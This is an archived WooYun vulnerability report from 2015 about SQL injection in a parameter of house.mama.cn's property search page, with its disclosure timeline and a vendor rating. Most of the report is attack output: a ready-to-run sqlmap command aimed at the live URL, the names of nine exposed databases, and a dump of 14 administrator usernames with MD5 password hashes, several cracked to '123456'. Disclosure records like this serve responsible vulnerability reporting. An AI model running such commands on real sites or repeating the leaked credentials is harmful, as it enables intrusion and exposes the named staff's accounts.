乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-25: 细节已通知厂商并且等待厂商处理中 2015-05-26: 厂商已经确认,细节仅向厂商公开 2015-06-05: 细节向核心白帽子及相关领域专家公开 2015-06-15: 细节向普通白帽子公开 2015-06-25: 细节向实习白帽子公开 2015-07-10: 细节向公众公开
听说厂商会送礼物
SQL注入URL:
sqlmap.py -u "http://house.mama.cn/index.php" --data "g=Loupan&m=Search&a=index&&areaid=0&sitetag=gz&priceorder=135791&spriceid=0&hxid=0&wytypeid=0&subwayid=0&saleid=0&hotblockid=0*"
hotblockid存在注入
available databases [9]:[*] baby_grow[*] home[*] house_mamadb[*] information_schema[*] jiaju_del[*] mama_living_expense[*] mamaPhoto_del[*] mysql[*] pinpai
涉及9个数据库
Database: house_mamadbTable: h_admin_user[14 entries]+---------------+-------------------------------------------+| au_name | au_pass |+---------------+-------------------------------------------+| admincp | deb2a8a396ffc6dca65f56d72dca3429 || liujianhui | 851c992cfe7ccca52464b41b188f9d16 || songcen | e10adc3949ba59abbe56e057f20f883e (123456) || sunyanan | e10adc3949ba59abbe56e057f20f883e (123456) || zhangyifang | c151f178ad94a25544d1f363e8c784cd || zhangqiongjie | e10adc3949ba59abbe56e057f20f883e (123456) || xujiexujie | 5a254658fe9f3258acdedeff1b22acc1 || wangwenya | 0709b51d1f7158f6b232ba44c2344cb0 || yuanping | e10adc3949ba59abbe56e057f20f883e (123456) || chenjiayan | c0a6b97e4b543871c2c73fb91ddc1fef || shenlan | a094d60f4af6d2e02e2ce90ac6f1c993 || jinanzhan | 00e28061720d0ee38ef3df960d175cda || zhangwenjie | 706e3d7619915e396cf4613e3289619b || jianglianfu | c715f0e7852d4d3265b5c974402ffafd |+---------------+-------------------------------------------+
管理员密码
求礼物
危害等级:中
漏洞Rank:10
确认时间:2015-05-26 12:12
谢谢
暂无